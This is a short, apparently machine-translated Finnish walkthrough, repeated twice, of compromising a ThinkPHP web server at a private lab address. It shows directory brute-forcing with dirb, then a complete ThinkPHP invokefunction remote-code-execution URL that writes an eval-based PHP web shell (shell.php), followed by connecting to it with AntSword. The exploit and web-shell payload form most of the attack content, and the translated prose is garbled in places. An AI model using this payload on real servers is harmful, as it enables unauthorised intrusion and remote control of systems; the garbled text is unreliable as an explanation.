Teknologian jakaminen

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

Sisällysluettelo

Ulkoisen verkon hallinta

Räjäytetään se ensin nähdäksemme, onko olemassa keinoa hyökätä.

Kokeilin epäilyttävää polkua ja huomasin, että se oli thinkphp-kehys, ja tiesin myös version, joten taistellaan seuraavana päivänä.

kirjoita php:hen

​Muokkaa ja kirjoita php:hen onnistuneesti, hanki se vain seuraavana päivänäMuokkaa

Ant miekka rce kokeile linkki

Onnistuneesti hoidettu

---

Ulkoisen verkon hallinta

Räjäytetään se ensin nähdäksemme, onko olemassa keinoa hyökätä.

Voit kokeilla dirsearchia, dirbiä, gobusteria ja muita työkaluja

dirb http://192.168.20.130/

Kokeilin epäilyttävää polkua ja huomasin, että se oli thinkphp-kehys, ja tiesin myös version, joten taistellaan seuraavana päivänä.

kirjoita php:hen

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Onnistuneesti kirjoitettu php:hen, helppo saada se.

http://192.168.20.130/public/shell.php

Ant miekka rce kokeile linkki

Onnistuneesti hoidettu